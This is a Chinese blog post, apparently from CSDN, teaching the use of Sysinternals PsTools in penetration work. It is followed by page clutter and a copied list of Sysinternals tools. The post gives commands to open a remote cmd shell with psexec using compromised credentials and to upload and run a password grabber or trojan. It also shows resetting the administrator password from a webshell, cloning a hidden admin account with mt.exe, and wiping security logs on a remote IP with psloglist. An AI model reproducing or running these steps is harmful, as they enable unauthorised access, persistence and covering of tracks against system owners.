pstools套件在渗透中的应用详解

其实接触pstool很久了,但是据我观察用pstools套件在渗透中的应用的介绍却比较少。

当然玩bt5的同学可能常常用到,小菜就写一篇关于pstools套件在渗透中的应用进行详解。

pstool的介绍

PsTools是Sysinternals Suite中一款排名靠前的一个安全管理工具套件。现在被微软收购。目前pstools中含有12款各式各样的小工具。如果将它们灵活的运用,将会在渗透中收到奇效。所有的pstool第一次运行时都会弹框。可以用–accepteula这个参数绕过。

还有所有的pstool都支持IP$,一旦IP$共享是连接的就不用输入-u 和-p这两个参数。

如何建立IP$连接。命令如下:

Net user \\目标ip\ 密码 /user:用户

Net user \\192.168.1.3\ 123456 /user:test

建立后所有的ps工具都将可以不用输入用户和密码了。

其中12款工具简介如下:

◆PsExec - 远程执行进程

◆PsFile - 显示远程打开的文件

◆PsGetSid - 显示计算机或用户的 SID

◆PsInfo - 列出有关系统的信息

◆PsKill - 按名称或进程 ID 终止进程

◆PsList - 列出有关进程的详细信息

◆PsLoggedOn - 查看在本地通过资源共享(包含所有资源)登录的用户

◆PsLogList - 转储事件日志记录

◆PsPasswd - 更改帐户密码

◆PsService - 查看和控制服务

◆PsShutdown - 关闭并重新启动(可选)计算机

◆PsSuspend - 暂停进程

这里讲对其中的几个工具进行详解,其他的将只介绍用法。

下载地址:http://download.sysinternals.com/files/PSTools.zip

psexec的应用详解

Pstools中最强大最常利用的工具就属psexec这款工具。这款工具的本意是替代telnet这种不安全的管理方式。它最大的特点就属无需安装客服端程序就可以远程操作服务器。

简单来说,就是一旦你知道服务器或者电脑的用户名和密码,你就可以利用它远程执行系统命令。这样一款工具放到渗透当中真是太淫荡了。它适用于windows NT/2x/xp/vista

下面介绍详细参数:

-u 远程计算机的用户名

-p 远程计算机用户对应密码

-c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除)

-d 不等待程序执行完就返回 (意思就是,当你执行一个程序无需等到他结束才返回信息)

-h用于目标系统是Vista或更高版本

其他参数就不做介绍,这里主要是讲用法。

远程获取一个cmdshell

比如我再渗透中扫描到目标机(192.168.1.3)的一个用户名(test)和密码(123456)。

那我们的命令就是:

psexec \\目标ip -u 用户名 -p 密码 进程名

psexec \\192.168.1.3 –u test –p 123456 cmd.exe

看下图,这是成功连接到一台远程服务器,并获得一个cmdshell,shell权限即位当前用户权限。

这里还将提到的是由于windows策略,将不允许空密码登陆。

可能有些机油对用户权限登陆还有疑虑,什么用户才可以登陆。

我这建立了一个属于guest的一个用户我们来看看它是否能连接。

经过测试,比guest权限大的用户组都可以远程登陆。

IIS_WPG用户组的无法远程连接,但是你不用担心,一般属于IIS_WPG用户组的用户一般也属于guest用户组。

有关用户组相关的介绍请围观法客周年庆之提权专题

下载地址: http://www.2cto.com/ebook/201211/35554.html

获取cmdshell的介绍就到这里。一旦获得一个cmdshell后面的渗透将会比较轻松。

经过测试,用最新版的pstools,windows2008 win7 都能连接成功,win8由于没有win8系统,就未测试,应该是能行的,毕竟这是微软的管理工具。

Win7连接示意图:

程序上传并执行

首先现在在本地配置一个将上传到服务器上运行的程序到H盘根目录。这里用抓取系统密码的神器getpass来演示。H:\getpass.exe

程序上传并执行命令如下:

Psexec \\192.169.1.3 –u test –p 12345 –c H:\getpass.exe –d

最后一个-d的参数可有可无~~~

只是怕程序远程运行后会卡住而无法返回信息。

测试如图:

当然你也可运行一个远控木马这些都可以~~~

Psexec 的介绍就到这里了。

pspasswd的应用详解

Pspasswd是一个用来更改用户密码的工具,支持远程密码修改和本地密码修改。这款工具的特点就是不依靠net,exe程序进行密码修改。

本地修改命令如下:

pspasswd administrator yueyan

演示图如下:

远程命令如下:

pspasswd \\192.168.1.3 –u administrator –p 123456 guest yueyan

命令的意思就是,用administrator这个管理员账户登录后修改用户guest的密码为yueyan

相对来说本地修改密码的功能更强大一些。

我这将介绍个实例:

我的一个好基友Lynn得到一个jsp马,并且是nt authority\system权限。但是无法添加用户,且无法用net修改管理员密码。抓取hash密码大于14位,LMhash无效,本地又为搭建彩虹表,网上破解无果。Hash传递登陆被拦截。但是机油lynn却一直想用administrator这个用户登陆进去,当然方法还有很多,比如: mimikatz.exe抓取明文密码等,这里我将介绍pspasswd的妙用。

我们想用administrator这个账户登陆进去。很简单,直接上传一个pspasswd上服务器。

执行下面的命令:

首先执行D:\web|pspasswd.exe –accepteula (第一次执行,表示许可执行的意思)

D:\web|pspasswd.exe administrator yueyan

就会成功修改administrator的密码。

这里能修改密码的原因是pspasswd不是调用net.exe进行密码修改。

上述介绍常常配合mt.exe进行用户克隆。这里简单介绍:

(关于mt.exe的详细介绍请访问:【工具】mt.exe的详细介绍)

首先mt.exe查看用户sid,比较后看是否有克隆账户

Mt -chkuser

比较后,没有克隆账户,我们选择guest这个账户进行克隆:

Mt –clone administrator guest

然后配合pspasswd修改密码:

Pspasswd guest yueyan

就这样成功克隆一个账户,并能成功登陆访问。

Pspasswd的功能就介绍到这里。

pskill+psinfo+pslist的应用详解

首先是介绍pskill.

如果你想远程结束远程主机上的一个进程,你可以使用pskill。

我们就介绍一下常用的命令:

比如我们想远程关闭远程主机正在运行的cmd这个进程,可以用pskill进行杀掉。命令如下:

pskill \\192.168.1.3 –u test –p 123456 cmd.exe

命令很简单~~~~

我再介绍psinfo的相关应用。

基本参数是:

-h 显示已经安装的补丁信息

-s 显示已安装的软件信息

-d 显示磁盘信息

如果我们想看远程主机的基本信息,命令如下:

psinfo –h –s –d \\192.168.1.3 –u administrator –p 123456

接下来就是pslist。

主要特点是,显示本地或者远程计算机的进程运行情况。

主要参数:

-m 显示内存信息

-x 显示进程,内存和线程

-t 显示进程树

-s n 在任务管理器模式先运行,n指定秒,以esc结束。

-r n 任务管理器模式刷新速率,n指秒

例如我们想看远程计算机的进程运行情况,命令如下:

Pslist –x \\192.168.1.3 –u test –p 123456

效果图如下:

其他ps工具介绍:

PSLOGGEDON:查看指定计算机的本地及远程登录的用户和登录时间。必须建立在IP$共享下才可以使用这个工具。

命令如下:

Psloggedon –l \\192.168.1.3

PSLOGLIST:事件日志转储及管理。

这个对于渗透测试是非常有用的,它最大的特点就是远程清理系统日志。

常用:

psloglist \\72.56.17.74 application -c > nul

psloglist \\72.56.17.74 system -c > nul

psloglist \\72.56.17.74 security -c > nul

分别是清理应用程序日志,系统运行日志,安全日志。

PSSERVICE:管理服务。

常用:

psservice query messenger

查询messenger服务的相关信息。

最重要的项目是:服务名称、显示名称、服务描述、服务类型、服务状态。

psservice config messenger

查询服务的配置信息。

最重要的项目是:服务名称、服务描述、服务类型、服务启动类型、服务错误控制级别、可执行文件的路径等等。

PSSHUTDOWN:关机工具。

常用命令:

Psshutdown –s –t 60

60秒后关机。

下面几个不常用,就介绍下:

PsFile - 显示远程打开的文件

Psfile \\192.168.1.3

PsGetSid - 显示计算机或用户的 SID

Psgetsid \\192.168.1.3

PsSuspend - 暂停进程

Pssuspend \\192.168.1.3 –u test –p 123456 cmd,exe


  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
首先关于 [评价可免费] 的严重声明: 一、评价=评论加评价(评星星); 二、评价必须是下载完了该资源后的评价,没下载就评论无效; 三、如果正确评价了,返还积分可能需要等等,系统需要反应下。呵呵 评论时记得要评分。然后会返回给你花费的分再加1分.理论上有十分就可以下载完所有的资源了。一般人我不告诉他。 http://technet.microsoft.com/zh-cn/sysinternals/bb842062(en-us).aspx sysinternals 的网站创立于1996年由Mark russinovich和布赖科格斯韦尔主办其先进的系统工具和技术资料.微软于2006年7月收购sysinternals公司 . 不管你是一个IT高级工作者还是一个开发者,你都会发现sysinternals工具可以帮助您管理、故障分析和诊断你的Windows系统和应用程序. 如果您有关于如何使用这些工具的问题,请访问sysinternals论坛从其他用户和我们的团队获取解答和帮助.   其包含   AccessChk   这个工具为您显示指定至档案、登录机码或 Windows 服务的使用者或群组之存取。   AccessEnum   这个简单又具有超高安全性的工具,会让您知道拥有对您系统目录、档案及登录机码的存取之对象和方式。用它来寻找您权限下的安全性漏洞。   AdRestore   取消删除 Server 2003 Active Directory 物件。   BgInfo   这个可完全设定的程式,会自动产生包括含有 IP 位址、电脑名称,和网路介面卡等等重要资讯的桌面背景。   BlueScreen   这个萤幕保护程式不只将「蓝色萤幕」(Blue Screens) 模仿得维妙维肖,也能模仿重新开机 (需使用 CHKDSK 完成),而且在 Windows NT 4、Windows 2000、Windows XP、Server 2003 和 Windows 9x 皆能执行。   CacheSet   CacheSet 是一种能让您使用 NT 提供的功能来控制 Cache Manager 的工作组大小。除了和 NT 所有版本相容之外,还提供原始程式码。   检视系统时钟的解析度,同时也是计时器解析度的最大值。   Contig   希望能够快速地将常用的档案进行磁碟重组吗?使用 Contig 最佳化个别档案,或是建立新的连续档案。   Ctrl2cap   这是一种核心模式驱动程式,展示键盘输入筛选只在键盘类别驱动程式之上,目的是为了将大写锁定按键转换至控制按键。这个层级的筛选允许在 NT 「发现」按键之前,先进行转换和隐藏按键。包括完整的来源。此外,Ctrl2cap 还会显示如何使用 NtDisplayString() 将讯息列印至初始化的蓝色萤幕。   DebugView   Sysinternals 的另一个首开先例:这个程式会拦截分别由 DbgPrint 利用装置驱动程式,和 OutputDebugString 利用 Win32 程式所做的呼叫。它能够在您的本机上或跨往际往路,在不需要作用的侦错工具情况下,检视和录制侦错工作阶段输出。   DiskExt   显示磁碟区磁碟对应。   Diskmon   这个公用程式会撷取全部的硬碟活动,或是提供系统匣的软体磁碟活动指示器的功能。   DiskView   图形化磁区公用程式。   Du   依目录检视磁碟使用状况。   EFSDump   检视加密档案的资讯。   Filemon   这个监控工具让您即时检视所有档案系统的活动。   Handle   这个易於操纵的命令列公用程式能够显示档案开启的种类和使用的处理程序等更多资讯。   Hex2dec   十六进位数字和十进位数字相互转换。   Junction   建立 Win2K NTFS 符号连结。   LDMDump   倾印逻辑磁碟管理员的磁碟上之资料库内容,其描述 Windows 2000 动态磁碟分割。   ListDLLs   列出所有目前载入的 DLL,包括载入位置和他们的版本编号。2.0 版列印载入模组的完整路径名称。   LiveKd   使用 Microsoft 核心侦错工具检视即时系统。   LoadOrder   检视在您 WinNT/2K 系统上载入装置的顺序。   LogonSessions   列出系统上的作用登入工作阶段。   MoveFile   允许您对下一次开机进行移动和删除命令的排程。   NTFSInfo   使用 NTFSInfo 检视详细的 NTFS 磁碟区资讯,包括主档案表格 (MFT) 和 MFT 区的大小和位置,还有 NTFS 继资料档案的大小。   PageDefrag   将您的分页档和登录 Hive 进行磁碟重组。   PendMoves   列举档案重新命名的清单,删除下次开机将会执行的命令。   Portmon   使用这个进阶的监视工具进行监视序列和平行连接埠活动。它不仅掌握所有标准的序列和平行 IOCTL,甚至会显示传送和接收的资料部份。Version 3.x 具有强大的新 UI 增强功能和进阶的筛选功能。   Process Monitor   即时监控档案系统、登录、程序、执行绪和 DLL 活动。   ProcFeatures   这个小应用程式会描述「实体位址扩充」的处理器和 Windows 支援,而没「没有执行」缓冲区溢位保护。   PsExec   以有限的使用者权限执行处理程序。   PsFile   检视远端开启档案有哪些。   PsGetSid   显示电脑或使用者的 SID。   PsInfo   取得有关系统的资讯。   PsKill   终止本机或远端处理程序。   PsList   显示处理程序和执行绪的相关资讯。   PsLoggedOn   显示使用者登录至一个系统。   PsLogList   倾印事件记录档的记录。   PsPasswd   变更帐户密码。   PsService   检视及控制服务。   PsShutdown   关机及选择重新启动电脑。   PsSuspend   暂停及继续处理程序。   PsTools   PsTools 产品系列包括命令列公用程式,其功能有列出在本机或远端电脑上执行的处理程序、远端执行的处理程序、重新开机的电脑和倾印事件记录等等。   RegDelNull   扫描并删除登录机码,这些登录机码包括了标准登录编辑工具无法删除的内嵌式 Null 字元。   RegHide   建立名为 "HKEY_LOCAL_MACHINE\Software\Sysinternals\Can't touch me!\0" 并使用原生 API 的金钥,而且会在此金钥内建立一个值。   Regjump   跳至您在 Regedit 指定的登录路径。   Regmon   这个监视工具让您即时看到全部的登录活动。   RootkitRevealer   扫描您系统上 Rootkit 为基础的恶意程式码。   SDelete   以安全的方法覆写您的机密档案,并且清除因先前使用这个 DoD 相容安全删除程式所删除档案後而释放的可用空间。包括完整的原始程式码。   ShareEnum   扫描网路上档案共用并检视其安全性设定,来关闭安全性漏洞。   Sigcheck   倾印档案版本资讯和验证系统上的影像皆已完成数位签章。   Strings   搜寻 binaryimages 的 ANSI 和 UNICODE 字串。   Sync   将快取的资料清除至磁碟。   TCPView   作用的通讯端命令列检视器。   VolumeId   设定 FAT 或 NTFS 磁碟区 ID。   Whois   看看谁拥有一个网际网路位址。   Winobj   最完整的物件管理员命名空间检视器在此。   ZoomIt   供萤幕上缩放和绘图的简报公用程式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值